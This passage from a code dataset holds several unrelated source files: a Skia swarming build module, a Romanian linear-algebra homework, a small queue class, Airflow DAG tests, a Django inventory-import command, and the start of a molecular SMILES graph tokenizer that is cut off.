and json output will be stored.\"\"\"\n return self.m.path['start_dir'].join('swarming_temp_dir')\n\n @property\n def tasks_output_dir(self):\n \"\"\"Directory where the outputs of the swarming tasks will be stored.\"\"\"\n return self.swarming_temp_dir.join('outputs')\n\n def isolated_file_path(self, task_name):\n \"\"\"Get the path to the given task's .isolated file.\"\"\"\n return self.swarming_temp_dir.join('skia-task-%s.isolated' % task_name)\n\n def setup(self, luci_go_dir, swarming_rev=None):\n \"\"\"Performs setup steps for swarming.\"\"\"\n self.m.swarming_client.checkout(revision=swarming_rev)\n self.m.swarming.check_client_version(step_test_data=(0, 8, 6))\n self.setup_go_isolate(luci_go_dir)\n self.m.swarming.add_default_tag('allow_milo:1')\n\n # TODO(rmistry): Remove once the Go binaries are moved to recipes or buildbot.\n def setup_go_isolate(self, luci_go_dir):\n \"\"\"Generates and puts in place the isolate Go binary.\"\"\"\n depot_tools_path = self.m.depot_tools.package_repo_resource()\n env = {'PATH': self.m.path.pathsep.join([\n str(depot_tools_path), '%(PATH)s'])}\n with self.m.context(env=env):\n self.m.step('download luci-go linux',\n ['download_from_google_storage', '--no_resume',\n '--platform=linux*', '--no_auth',\n '--bucket', 'chromium-luci',\n '-d', luci_go_dir.join('linux64')])\n self.m.step('download luci-go mac',\n ['download_from_google_storage', '--no_resume',\n '--platform=darwin', '--no_auth',\n '--bucket', 'chromium-luci',\n '-d', luci_go_dir.join('mac64')])\n self.m.step('download luci-go win',\n ['download_from_google_storage', '--no_resume',\n '--platform=win32', '--no_auth', '--bucket',\n 'chromium-luci',\n '-d', luci_go_dir.join('win64')])\n # Copy binaries to the expected location.\n dest = self.m.path['start_dir'].join('luci-go')\n self.m.run.rmtree(dest)\n self.m.file.copytree('Copy Go binary',\n source=luci_go_dir,\n dest=dest)\n\n def create_isolated_gen_json(self, isolate_path, base_dir, os_type,\n task_name, extra_variables, blacklist=None):\n \"\"\"Creates an isolated.gen.json file (used by the isolate recipe module).\n\n Args:\n isolate_path: path obj. Path to the isolate file.\n base_dir: path obj. Dir that is the base of all paths in the isolate file.\n os_type: str. The OS type to use when archiving the isolate file.\n Eg: linux.\n task_name: str. The isolated.gen.json file will be suffixed by this str.\n extra_variables: dict of str to str. The extra vars to pass to isolate.\n Eg: {'SLAVE_NUM': '1', 'MASTER': 'ChromiumPerfFYI'}\n blacklist: list of regular expressions indicating which files/directories\n not to archive.\n \"\"\"\n self.m.file.ensure_directory(\n 'makedirs swarming tmp dir',\n self.swarming_temp_dir)\n isolated_path = self.isolated_file_path(task_name)\n isolate_args = [\n '--isolate', isolate_path,\n '--isolated', isolated_path,\n '--config-variable', 'OS', os_type,\n ]\n if blacklist:\n for b in blacklist:\n isolate_args.extend(['--blacklist', b])\n for k, v in extra_variables.iteritems():\n isolate_args.extend(['--extra-variable', k, v])\n isolated_gen_dict = {\n 'version': 1,\n 'dir': base_dir,\n 'args': isolate_args,\n }\n isolated_gen_json = self.swarming_temp_dir.join(\n '%s.isolated.gen.json' % task_name)\n self.m.file.write_text(\n 'Write %s.isolated.gen.json' % task_name,\n isolated_gen_json,\n self.m.json.dumps(isolated_gen_dict, indent=4),\n )\n\n def batcharchive(self, targets):\n \"\"\"Calls batcharchive on the skia.isolated.gen.json file.\n\n Args:\n targets: list of str. The suffixes of the isolated.gen.json files to\n archive.\n\n Returns:\n list of tuples containing (task_name, swarming_hash).\n \"\"\"\n return self.m.isolate.isolate_tests(\n verbose=True, # To avoid no output timeouts.\n build_dir=self.swarming_temp_dir,\n targets=targets).presentation.properties['swarm_hashes'].items()\n\n def trigger_swarming_tasks(\n self, swarm_hashes, dimensions, idempotent=False, store_output=True,\n extra_args=None, expiration=None, hard_timeout=None, io_timeout=None,\n cipd_packages=None):\n \"\"\"Triggers swarming tasks using swarm hashes.\n\n Args:\n swarm_hashes: list of str. List of swarm hashes from the isolate server.\n dimensions: dict of str to str. The dimensions to run the task on.\n Eg: {'os': 'Ubuntu', 'gpu': '10de', 'pool': 'Skia'}\n idempotent: bool. Whether or not to de-duplicate tasks.\n store_output: bool. Whether task output should be stored.\n extra_args: list of str. Extra arguments to pass to the task.\n expiration: int. Task will expire if not picked up within this time.\n DEFAULT_TASK_EXPIRATION is used if this argument is None.\n hard_timeout: int. Task will timeout if not completed within this time.\n DEFAULT_TASK_TIMEOUT is used if this argument is None.\n io_timeout: int. Task will timeout if there is no output within this time.\n DEFAULT_IO_TIMEOUT is used if this argument is None.\n cipd_packages: CIPD packages which these tasks depend on.\n\n Returns:\n List of swarming.SwarmingTask instances.\n \"\"\"\n swarming_tasks = []\n for task_name, swarm_hash in swarm_hashes:\n swarming_task = self.m.swarming.task(\n title=task_name,\n cipd_packages=cipd_packages,\n isolated_hash=swarm_hash)\n if store_output:\n swarming_task.task_output_dir = self.tasks_output_dir.join(task_name)\n swarming_task.dimensions = dimensions\n swarming_task.idempotent = idempotent\n swarming_task.priority = 90\n swarming_task.expiration = (\n expiration if expiration else DEFAULT_TASK_EXPIRATION)\n swarming_task.hard_timeout = (\n hard_timeout if hard_timeout else DEFAULT_TASK_TIMEOUT)\n swarming_task.io_timeout = (\n io_timeout if io_timeout else DEFAULT_IO_TIMEOUT)\n if extra_args:\n swarming_task.extra_args = extra_args\n revision = self.m.properties.get('revision')\n if revision:\n swarming_task.tags.add('revision:%s' % revision)\n swarming_tasks.append(swarming_task)\n step_results = self.m.swarming.trigger(swarming_tasks)\n for step_result in step_results:\n self._add_log_links(step_result, step_result.json.output)\n return swarming_tasks\n\n def collect_swarming_task(self, swarming_task):\n \"\"\"Collects the specified swarming task.\n\n Args:\n swarming_task: An instance of swarming.SwarmingTask.\n \"\"\"\n try:\n rv = self.m.swarming.collect_task(swarming_task)\n except self.m.step.StepFailure as e: # pragma: no cover\n step_result = self.m.step.active_result\n # Change step result to Infra failure if the swarming task failed due to\n # expiration, time outs, bot crashes or task cancelations.\n # Infra failures have step.EXCEPTION.\n states_infra_failure = (\n self.m.swarming.State.EXPIRED, self.m.swarming.State.TIMED_OUT,\n self.m.swarming.State.BOT_DIED, self.m.swarming.State.CANCELED)\n summary = step_result.swarming.summary\n if summary['shards'][0]['state'] in states_infra_failure:\n step_result.presentation.status = self.m.step.EXCEPTION\n raise self.m.step.InfraFailure(e.name, step_result)\n raise\n finally:\n step_result = self.m.step.active_result\n # Add log link.\n self._add_log_links(step_result, step_result.swarming.summary)\n return rv\n\n def _add_log_links(self, step_result, summary):\n \"\"\"Add Milo log links to all shards in the step.\"\"\"\n ids = []\n shards = summary.get('shards')\n if shards:\n for shard in shards:\n ids.append(shard['id'])\n else:\n for _, task in summary.get('tasks', {}).iteritems():\n ids.append(task['task_id'])\n for idx, task_id in enumerate(ids):\n link = MILO_LOG_LINK % task_id\n k = 'view steps on Milo'\n if len(ids) > 1: # pragma: nocover\n k += ' (shard index %d, %d total)' % (idx, len(ids))\n step_result.presentation.links[k] = link\n\n","repo_name":"kiwibrowser/src","sub_path":"third_party/skia/infra/bots/recipe_modules/skia_swarming/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":8900,"program_lang":"python","lang":"en","doc_type":"code","stars":2475,"dataset":"github-code","pt":"52"} +{"seq_id":"39170342226","text":"import numpy as np\nimport math\nimport copy\n\ndef subs_desc(a, b):\n \"\"\" Metoda substitutiei descendente \"\"\"\n\n \"\"\" Verifica daca matricea A este patratica + compatibilitatea cu vectorul b\"\"\"\n assert a.shape[0] == a.shape[1], 'Matricea sistemului nu este patratica'\n assert a.shape[0] == b.shape[0], 'Matricea sistemului si vectorul b nu se potrivesc'\n\n \"\"\" Initializeaza vectorul solutiei numerice.\"\"\"\n n = b.shape[0] - 1\n x_num = np.zeros(shape=n+1)\n\n \"\"\" Determina solutia numerica.\"\"\"\n x_num[n] = b[n] / a[n, n] # Scrie ultima componenta a solutiei numerice\n # Parcurgem liniile de la final si aflam xk la fiecare pas\n for k in range(n-1, -1, -1):\n s = np.dot(a[k, k + 1:], x_num[k + 1:])\n x_num[k] = (b[k] - s) / a[k, k]\n\n return x_num\n\ndef subs_asc(a, b):\n \"\"\" Metoda substitutiei ascendente \"\"\"\n\n assert a.shape[0] == a.shape[1], 'Matricea sistemului nu este patratica'\n assert a.shape[0] == b.shape[0], 'Matricea sistemului si vectorul b nu se potrivesc'\n\n \"\"\" Initializeaza vectorul solutiei numerice.\"\"\"\n n = b.shape[0]\n x_num = np.zeros(shape=n)\n\n \"\"\" Determina solutia numerica.\"\"\"\n x_num[0] = b[0] / a[0, 0] # Scrie prima componenta a solutiei numerice\n\n # Parcurgem liniile de la inceput si aflam xk la fiecare pas\n for k in range(1, n):\n s = np.dot(a[k, :k], x_num[:k])\n x_num[k] = (b[k] - s) / a[k, k]\n\n return x_num\n\n\n#######################################################################################\n\ndef meg_pivotare_totala(a, b):\n \"\"\"\n Metoda Gauss cu pivotare totala\n Se da sistemul Ax = b\n :return: rezultatul sistemului\n \"\"\"\n\n \"\"\" Verifica daca matricea A este patratica + compatibilitatea cu vectorul b\"\"\"\n assert a.shape[0] == a.shape[1], 'Matricea sistemului nu este patratica'\n assert a.shape[0] == b.shape[0], 'Matricea sistemului si vectorul b nu se potrivesc'\n\n \"\"\" Verificare daca sistemul are solutie unica \"\"\"\n if np.linalg.det(a) == 0:\n raise AssertionError('Sistemul nu are solutie unica')\n\n\n a_ext = np.concatenate((a, b[:, None]), axis = 1)\n n = b.shape[0]\n idx = np.array([i for i in range(n)])\n\n for k in range(n-1):\n \"\"\" Aflam pozitia pivotului de pe coloana k + verificare compatibilitate sistem\"\"\"\n \"\"\" Verificam daca in submatricea care incepe cu linia si coloana k exista elemente nenule\"\"\"\n if not a_ext[k:, k:n].any():\n raise AssertionError('Sistem incompatibil sau sistem compatibil nedeterminat')\n else:\n \"\"\" Alegem pozitia pivotul\"\"\"\n p = np.unravel_index(np.argmax(np.abs(a_ext[k:, k:n])),a_ext[k:, k:n].shape)\n p = (p[0] + k, p[1] + k) #pe prima pozitie este linia, iar pe a doua este coloana\n\n \"\"\" Schimba linia 'k' cu 'p' daca linia pivotului nu este k.\"\"\"\n if k != p[0]:\n a_ext[[p[0], k], :] = a_ext[[k, p[0]], :] #interschimba liniile\n\n \"\"\" Schimba coloana 'k' cu 'p' daca coloana pivotului nu este k. Marcam schimbarea in idx\"\"\"\n if k != p[1]:\n a_ext[:, [p[1], k]] = a_ext[:, [k, p[1]]] #interschimba coloanele\n idx[p[1]], idx[k] = idx[k], idx[p[1]]\n\n \"\"\" Zero sub pozitia pivotului pe coloana. \"\"\"\n for j in range(k + 1, n):\n m = a_ext[j, k] / a_ext[k, k]\n a_ext[j, :] -= m * a_ext[k, :]\n\n \"\"\" Verifica compatibilitate again.\"\"\"\n \"\"\" Elementul din dreapta jos trebuie sa fie diferit de 0\"\"\"\n if a_ext[n-1, n-1] == 0:\n raise AssertionError('Sistem incompatibil sau sistem compatibil nedeterminat')\n\n \"\"\" Gaseste solutia numerica folosind metoda substitutiei descendente. \"\"\"\n x_num = subs_desc(a_ext[:, :-1], a_ext[:, -1])\n \"\"\" Permutam solutiile conform idx \"\"\"\n x_num_ = np.empty(x_num.shape)\n for i in range(n):\n x_num_[idx[i]] = x_num[i]\n return x_num_\n\n\n#############################################################################################\n\n\ndef calcul_inversa(a):\n \"\"\"\n Calcularea inversei unei matrici a folosind metoda Gauss cu pivotare totala\n :return: a^(-1)\n \"\"\"\n\n \"\"\"\n Aplicam meg cu pivotare totala pentru calcularea inversei pentru a avea erori\n cat mai mici (daca este cazul)\n \"\"\"\n\n \"\"\" Verifica daca matricea A este patratica \"\"\"\n assert a.shape[0] == a.shape[1], 'Matricea sistemului nu este patratica'\n\n \"\"\" Verificare daca matricea e inversabila (determinantul e diferit de 0) \"\"\"\n if np.linalg.det(a) == 0:\n raise AssertionError('Matricea nu e inversabila')\n\n n = a.shape[0]\n I = np.identity(n)\n A_inv = np.zeros(a.shape)\n\n \"\"\" \n Stim ca A*A_inv = I\n Despartim matricile A_inv si I in coloane si calculam folosind meg fiecare coloana\n din A_inv.\n \"\"\"\n for k in range(n):\n A_inv[:, k] = meg_pivotare_totala(a, I[:, k])\n\n return A_inv\n\n#############################################################################################\n\ndef factorizare_LU(a):\n \"\"\"\n Functie care calculeaza factorizarea LU cu pivotare partiala a lui A, afland P, L si U din PA = LU\n :param a: matricea careia i se calculeaza factorizarea LU\n :return: L, U si matricea permutarilor\n \"\"\"\n\n \"\"\" Verifica daca matricea A este patratica \"\"\"\n assert a.shape[0] == a.shape[1], 'Matricea sistemului nu este patratica'\n\n \"\"\" Verificare daca sistemul are solutie unica \"\"\"\n if np.linalg.det(a) == 0:\n raise AssertionError('Sistemul nu are solutie unica')\n\n \"\"\"\n Construim L, U si P. L initial este On, la care se va aduna la final In.\n P pleaca de la matricea identitate.\n U pleaca de la matricea a (am facut shallow copy pentru a putea folosi a pentru verificari).\n \"\"\"\n L = np.zeros(a.shape)\n U = copy.copy(a)\n n = a.shape[0]\n P = np.identity(n)\n\n\n for k in range(n-1):\n \"\"\" Aflam pozitia pivotului de pe coloana k + verificare compatibilitate sistem\"\"\"\n if not U[k:, k].any(): # verificam daca exista cel putin o valoare nenula pe coloana k incepand cu pozitia k\n raise AssertionError('Matricea nu admite factorizarea LU')\n else:\n #aflam pozitia pivotului\n p = np.argmax(np.abs(U[k:, k]))\n p += k\n\n \"\"\" Schimba linia 'k' cu 'p' daca pivotul nu se afla pe diagonala pricipala.\"\"\"\n if k != p:\n U[[p, k], :] = U[[k, p], :] # interschimba liniile in U\n L[[p, k], :] = L[[k, p], :] # interschimba liniile in L\n P[[p, k], :] = P[[k, p], :] # interschimba liniile in P; semnalizam ca s-a produs o permutare a liniilor\n\n\n \"\"\" Zero sub pozitia pivotului pe coloana. \"\"\"\n for j in range(k+1, n):\n m = U[j, k] / U[k, k]\n U[j, :] -= m * U[k, :] #actualizam valorile din U\n L[j,k] = m #actualizam L\n\n \"\"\" \n Verifica compatibilitate again.\n Elementul din dreapta jos trebuie sa fie diferit de 0 pentru a fi un sistem compatibil determinat\n \"\"\"\n if U[n-1, n-1] == 0:\n raise AssertionError('Sistem incompatibil sau sistem compatibil nedeterminat')\n\n # Adaugam matricea identitate la L\n L = L + np.identity(n)\n\n return L, U, P\n\ndef rezolvare_sistem(L, U, P, b):\n \"\"\"\n Functie care pe baza unei factorizari LU rezolva sistemul Ax = b\n :param L: matrice inferior triunghiulara\n :param U: matrice superior triunghiulara\n :param P: matrice de permutari\n :param b: rezultatul ecuatiei Ax = b\n :return: solutia x_sol a sistemului Ax = b\n \"\"\"\n\n \"\"\"\n Deoarece PA = LU, atunci:\n Ax = b | *P la stanga\n PAx = Pb => LUx = Pb; aflam b_ = Pb\n \"\"\"\n b_ = np.matmul(P,b)\n # Aflam Lx_num = b_, unde x_num = Ux\n x_num = subs_asc(L, b_)\n # Returnam solutia sistemului\n return subs_desc(U, x_num)\n\n\n\n#############################################################################################\n\ndef met_Cholesky(a):\n \"\"\"\n Functie care aplica descompunerea Cholesky pe matricea a\n Vom afla matricea L, astfel incat L*L_transpus = a\n \"\"\"\n\n \"\"\" Verifica daca matricea A este patratica \"\"\"\n assert a.shape[0] == a.shape[1], 'Matricea sistemului nu este patratica'\n\n \"\"\" Pentru a admite descompunerea Cholesky, matricea trebuie sa fie simetrica si pozitiv definita. \"\"\"\n \"\"\" Verificare simetrie: A trebuie sa fie egal cu A transpus (va admite o eroare de calcul de 1e-8) \"\"\"\n if not np.all(np.abs(a - a.T) < 1e-8):\n raise AssertionError('Matricea nu e simetrica')\n\n \"\"\" Verificare pozitiv definita: folosind criteriul lui Sylvester, toti minorii de colt > 0 \"\"\"\n n = a.shape[0]\n for k in range(n):\n if np.linalg.det(a[:k + 1, :k + 1]) <= 0:\n raise AssertionError('Matricea nu e pozitiv definita')\n\n L = np.zeros(a.shape)\n n = a.shape[0]\n alpha = a[0, 0]\n if alpha <= 0:\n raise AssertionError('Matricea nu e pozitiv definita. Nu se poate aplica metoda Cholesky')\n\n L[0,0] = math.sqrt(alpha)\n #Am calculat L[0][0], calculam elementele de pe prima coloana\n for i in range(1, n):\n L[i,0] = a[i, 0]/L[0, 0]\n\n for k in range(1, n):\n alpha = a[k, k] - np.dot(L[k, :k], L[k, :k])\n if alpha <= 0:\n raise AssertionError('Matricea nu e pozitiv definita. Nu se poate aplica metoda Cholesky')\n #calculam elementele de pe diagonala principala, dupa care restul elementelor\n L[k, k] = math.sqrt(alpha)\n\n for i in range(k+1,n):\n L[i,k] = 1/L[k,k] * (a[i,k] - np.dot(L[i, :k], L[k, :k]))\n\n return L\n\n\n\n\ndef exercitiul_1():\n \"\"\"\n Sa se verifice daca sistemul (1) admite solutie unica si in caz afirmativ sa se determine solutia folosind metoda\n Gauss cu pivotare totala.\n \"\"\"\n\n print('Exercitiul 1\\n')\n A = np.array([\n [0., -7., 4., 7.],\n [-10., -8., -4., -8.],\n [-10., -1., -1., 0.],\n [-7., -1., -5., -9.]\n ])\n b = np.array([38., -160., -51., -126.]).T\n\n \"\"\"\n Pentru a verifica daca sistemul are solutie unica, se verifica daca determinantul matricii A este diferit de 0.\n Am calculat determinantul folosind np.linalg.det(A) in cadrul functiei meg_pivotare_totala().\n In cazul in care nu se respecta conditia, se va afisa un mesaj corespunzator si se va opri executia functiei.\n In acest caz determinantul este -138, deci sistemul are solutie unica.\n \"\"\"\n\n x_sol = meg_pivotare_totala(A, b)\n print('====> Solutia sistemului Ax = b:')\n print(x_sol)\n b_check = np.matmul(A, x_sol)\n print('Verificarea rezultatului:')\n print(b_check)\n\n\ndef exercitiul_2():\n \"\"\"\n Verificati daca matricea B este inversabila si in caz afirmativ aplicati metoda Gauss\n pentru determinarea inversei.\n \"\"\"\n print('Exercitiul 2\\n')\n B = np.array([\n [0., -7., -6., -2.],\n [-4., -2., -4., 6.],\n [4., -3., -10., 1.],\n [9., 1., 3., 9.]\n ])\n\n \"\"\"\n O matrice este inversabila daca determinantul este diferit de 0. Verificarea se va face\n in calcul_inversa(B).\n \"\"\"\n print('Inversa lui B este')\n B_inv = calcul_inversa(B)\n print(B_inv)\n print('Verificare B*B_inv = I')\n #Rotunjim rezultatul la 7 zecimale pentru a vedea daca este In\n print(np.ma.round(np.matmul(B, B_inv),7))\n\n\ndef exercitiul_3():\n \"\"\"\n Sa se verifice daca sistemul (3) admite solutie unica ¸si in caz afirmativ sa se determine\n solutia folosind factorizarea LU cu pivotare partiala.\n \"\"\"\n print('Exercitiul 3\\n')\n A = np.array([\n [0., -1., -6., -7.],\n [-7., 6., -6., 5.],\n [5., 7., 2., 7.],\n [-1., -5., 5., -7.]\n ])\n b = np.array([-76., 3., 95., -40])\n\n \"\"\"\n Pentru a verifica daca sistemul are solutie unica, se verifica daca determinantul matricii A este diferit de 0.\n Am calculat determinantul folosind np.linalg.det(A) in cadrul functiei factorizare_LU().\n \"\"\"\n L, U, P = factorizare_LU(A)\n print('Matricea L:')\n print(L)\n print('Matricea U:')\n print(U)\n print('====> Solutia sistemului este:')\n x_sol = rezolvare_sistem(L, U, P, b)\n print(x_sol)\n print('Verificarea A:')\n #Verificam daca PA = LU, adica daca A = P_inversa * L * U (matricile permutari P sunt inversabile)\n P_inv = np.linalg.inv(P)\n A_check = np.matmul(np.matmul(P_inv, L), U)\n print(A_check)\n print('Verificarea rezultatului:')\n b_check = np.matmul(A, x_sol)\n print(b_check)\n\n\ndef exercitiul_4():\n \"\"\"\n Sa se verifice daca matricea C admite factorizare Cholesky si in caz afirmativ sa se determine aceasta.\n \"\"\"\n print('Exercitiul 4\\n')\n A = np.array([\n [4., 20., -12., 10.],\n [20., 104., -58., 68.],\n [-12., -58., 62., 14.],\n [10., 68., 14., 191.]\n ])\n \"\"\" \n Pentru a admite descompunerea Cholesky, matricea trebuie sa fie simetrica si pozitiv definita. \n Verificarea se va face in functia met_Cholesky\n \"\"\"\n L = met_Cholesky(A)\n print('Matricea L:')\n print(L)\n print('Matricea L transpus:')\n print(L.T)\n print('Verificare LL_transpus = A:')\n A_check_cholesky = np.matmul(L, L.T)\n print(A_check_cholesky)\n\n\n\nexercitiul_1()\nprint('____________________________________________________________________')\nexercitiul_2()\nprint('____________________________________________________________________')\nexercitiul_3()\nprint('____________________________________________________________________')\nexercitiul_4()","repo_name":"LauraElenaCozma/University","sub_path":"CN/Tema_2.py","file_name":"Tema_2.py","file_ext":"py","file_size_in_byte":13398,"program_lang":"python","lang":"ro","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"24736076516","text":"\nclass Queue:\n queue = [] \n back, front = 0,0\n\n @classmethod\n def enqueue(cls, num):\n cls.queue.append(num)\n cls.back += 1\n\n @classmethod\n def dequeue(cls):\n if len(cls.queue) == 0: return -1\n\n dequeued = cls.queue.pop(cls.front)\n cls.back -= 1\n\n return dequeued\n\nqueue1 = Queue()\nqueue1.enqueue(3)\nqueue1.enqueue(4)\nqueue1.dequeue()\nqueue1.enqueue(8)\nqueue1.enqueue(74)\nqueue1.dequeue()\nqueue1.dequeue()\nqueue1.dequeue()\n\n\nprint(queue1.dequeue())\nprint(queue1.queue)","repo_name":"kadimasum/BridgePy","sub_path":"queues/my_queue.py","file_name":"my_queue.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"42411246158","text":"from collections import Mapping\n\nfrom airflow import models\nfrom airflow.utils import db, timezone\n\n\ndef test_main_conf(main_conf):\n assert isinstance(main_conf, Mapping)\n\n\ndef test_connections(main_conf):\n _ = main_conf\n with db.create_session() as session:\n https_conn, postgres_conn = session.query(models.Connection).all()\n assert https_conn.get_uri() == 'https://www.google.com:443?param=1&option=2'\n assert postgres_conn.port == 5432\n\n\ndef test_variables(main_conf):\n _ = main_conf\n var1 = models.Variable.get('key')\n var2 = models.Variable.get('json_key', deserialize_json=True)\n\n assert var1 == 'value'\n assert var2['a'] == 1\n\n\n\ndef test_dag_dummy(dags):\n assert 'test_dag_dummy' in dags\n\n dag: models.DAG = dags['test_dag_dummy']\n\n assert len(dag.topological_sort()) == 3\n\n dag.clear()\n dag.run()\n\n\ndef test_dag_bash(dags):\n assert 'test_dag_bash' in dags\n\n dag: models.DAG = dags['test_dag_bash']\n assert len(dag.topological_sort()) == 2\n\n dag.clear()\n dag.run()\n\ndef test_dag_complex(dags):\n assert 'test_dag_complex' in dags\n\n dag: models.DAG = dags['test_dag_complex']\n assert len(dag.topological_sort()) == 3\n\n dag.clear()\n dag.run()\n\n # test unicode support\n value = models.XCom.get_one(\n execution_date=timezone.datetime(2016, 1, 1),\n key='нечто',\n task_id='pushing_task',\n dag_id='test_dag_complex',\n )\n assert value == 'ну как бы некий текст'\n","repo_name":"jjj4x/airflow_with_docker","sub_path":"tests/test_all.py","file_name":"test_all.py","file_ext":"py","file_size_in_byte":1513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10485080514","text":"\"\"\"\n분수찾기\n1 <= X <= 10^7 : int\n\n==풀이==\n1 > 2 > 3 > 4 > 5 로 증가하는 등차수열\n지그재그 형태 => 홀, 짝 계산\n\"\"\"\nimport sys\nIn = sys.stdin.readline\n\n\ndef main():\n x = int(In())\n denominator = 0\n\n while True:\n x -= denominator\n denominator += 1\n if x <= denominator:\n break\n\n if denominator % 2 == 0:\n numerator = x\n denominator = denominator - x + 1\n else:\n numerator = denominator - x + 1\n denominator = x\n\n print('%d/%d' % (numerator, denominator))\n\n\nmain()\n","repo_name":"Gun1Yun/Baekjoon-python","sub_path":"1193.py","file_name":"1193.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31943530800","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.core.management.base import BaseCommand\nfrom oms.models.order_models import *\nfrom oms.views import namedtuplefetchall\nimport logging\nfrom django.db import connections\nfrom django.db import transaction\nfrom collections import namedtuple\nimport datetime\n\nfrom wms.models import inventory_initial, inventory_struct, product_frame\n\n\"\"\"维护pgorder的phone和base_entity字段\"\"\"\n\n\nclass Command(BaseCommand):\n def handle(self, *args, **options):\n logging.critical('start ....')\n with open('inventory.csv') as inv_file:\n line = inv_file.readline()\n while line:\n lines = line.split(',')\n sku = lines[0]\n qty = lines[1]\n if sku.find('-') > 0:\n sku = sku.replace('-', '')\n\n if int(qty) > 0:\n prods = product_frame.objects.filter(sku=sku)\n if len(prods) > 0:\n prod = prods[0]\n logging.critical('Product 已更新: %s' % sku)\n else:\n prod = product_frame()\n prod.comments = '系统初始化时自动创建'\n logging.critical('Product created: %s' % sku)\n\n prod.sku = sku\n prod.user_id = 1\n prod.user_name = 'System'\n prod.save()\n\n invis = inventory_initial.objects.filter(sku=sku)\n if len(invis) > 0:\n invi = invis[0]\n invi.comments += '\\n' + datetime.datetime.now().strftime('%Y-%m-%d|%H:%M:%S') + '系统自动更新'\n else:\n invi = inventory_initial()\n invi.comments = '系统批量自动创建'\n\n invi.user_id = 1\n invi.user_name = 'System'\n # invi.comments = '系统批量自动创建'\n invi.sku = sku\n invi.quantity = decimal.Decimal(qty)\n invi.save()\n\n logging.critical('库存初始化成功')\n\n invss = inventory_struct.objects.filter(sku=sku)\n if len(invss) > 0:\n invs = invss[0]\n invs.comments += '\\n' + datetime.datetime.now().strftime('%Y-%m-%d|%H:%M:%S') + '系统自动更新'\n else:\n invs = inventory_struct()\n invs.comments = '系统批量自动创建'\n\n invs.user_id = 1\n invs.user_name = 'System'\n invs.sku = sku\n invs.quantity += decimal.Decimal(qty)\n invs.save()\n\n logging.critical('库存结构创建成功')\n\n else:\n pass\n # logging.critical('库存小于0, 跳过: %s' % sku)\n\n line = inv_file.readline()\n\n logging.critical('所有操作成功结束 ....')\n","repo_name":"qiaozhizt/OMS","sub_path":"oms/management/commands/inventory_init.py","file_name":"inventory_init.py","file_ext":"py","file_size_in_byte":3151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9404774000","text":"# https://github.com/dakoner/keras-molecules/blob/dbbb790e74e406faa70b13e8be8104d9e938eba2/convert_rdkit_to_networkx.py\n# https://github.com/snap-stanford/pretrain-gnns/blob/80608723ac3aac0f7059ffa0558f082252524493/chem/loader.py#L260\n\nimport random\nfrom networkx.algorithms.shortest_paths.dense import floyd_warshall_numpy\nimport numpy as np\nimport networkx as nx\nimport torch\n\nfrom copy import copy, deepcopy\n\nfrom torch.nn.utils.rnn import pad_sequence\n\nfrom data.smiles import (\n TOKEN2ATOMFEAT,\n TOKEN2BONDFEAT,\n get_max_valence,\n molgraph2smiles,\n smiles2molgraph,\n get_bond_order,\n)\nfrom data.dfs import dfs_successors\n\nfrom util import pad_square\nfrom collections import defaultdict\n\n\nBOS_TOKEN = \"[bos]\"\nEOS_TOKEN = \"[eos]\"\nPAD_TOKEN = \"[pad]\"\nMASK_TOKEN = \"[mask]\"\nSPECIAL_TOKENS = [\"[pad]\", \"[mask]\", \"[bos]\", \"[eos]\"]\nATOM_TOKENS = [token for token in TOKEN2ATOMFEAT]\nBOND_TOKENS = [token for token in TOKEN2BONDFEAT]\nBRANCH_START_TOKEN = \"(\"\nBRANCH_END_TOKEN = \")\"\nBRANCH_TOKENS = [BRANCH_START_TOKEN, BRANCH_END_TOKEN]\n\nRING_START_TOKEN = \"[bor]\"\nPOSSIBLE_RING_IDXS = 100\nRING_END_TOKENS = [f\"[eor{idx}]\" for idx in range(POSSIBLE_RING_IDXS)]\n\nTOKENS = SPECIAL_TOKENS + BRANCH_TOKENS + ATOM_TOKENS + BOND_TOKENS + [RING_START_TOKEN] + RING_END_TOKENS\n\nRING_ID_START = len(TOKENS) - len(RING_END_TOKENS)\nRING_ID_END = len(TOKENS)\n\nTOKEN2ID = {token: idx for idx, token in enumerate(TOKENS)}\nID2TOKEN = {idx: token for idx, token in enumerate(TOKENS)}\n\n\ndef get_id(token):\n return TOKEN2ID[token]\n\n\ndef get_ids(tokens):\n return [TOKEN2ID[token] for token in tokens]\n\n\ndef get_token(id):\n return TOKENS[id]\n\n\ndef get_ring_end_token(idx):\n return f\"[eor{idx}]\"\n\n\ndef get_ring_end_idx(token):\n return RING_END_TOKENS.index(token)\n\n\nMAX_LEN = 250\n\n\nclass Data:\n def __init__(self):\n self.sequence = []\n self.tokens = []\n self.node_to_token = dict()\n self.node_to_valence = dict()\n\n #\n self._node_offset = -1\n self._ring_offset = -1\n\n #\n self.pointer_node_traj = []\n\n #\n self.up_loc_square = -np.ones((MAX_LEN, MAX_LEN), dtype=int)\n self.down_loc_square = -np.ones((MAX_LEN, MAX_LEN), dtype=int)\n\n #\n self.branch_start_nodes = []\n self.ring_to_nodes = defaultdict(list)\n\n #\n self.started = False\n self.ended = False\n self.error = None\n\n #\n self.valence_mask_traj = []\n self.graph_mask_traj = []\n\n #\n self.update(get_id(BOS_TOKEN))\n\n def __len__(self):\n return len(self.G.nodes())\n\n def update(self, id):\n token = get_token(id)\n if len(self.graph_mask_traj) == 0:\n if token != BOS_TOKEN:\n self.ended = True\n self.error = \"add token without bos\"\n return\n\n elif self.graph_mask_traj[-1][id]:\n self.ended = True\n self.error = \"caught by graph mask\"\n return\n\n elif self.valence_mask_traj[-1][id]:\n self.ended = True\n self.error = \"caught by valency mask\"\n return\n\n self.sequence.append(id)\n self.tokens.append(token)\n\n if token in (ATOM_TOKENS + BOND_TOKENS):\n self._node_offset += 1\n new_node = copy(self._node_offset)\n\n self.node_to_token[new_node] = token\n\n self.up_loc_square[new_node, new_node] = 0\n self.down_loc_square[new_node, new_node] = 0\n if new_node > 0:\n pointer_node = 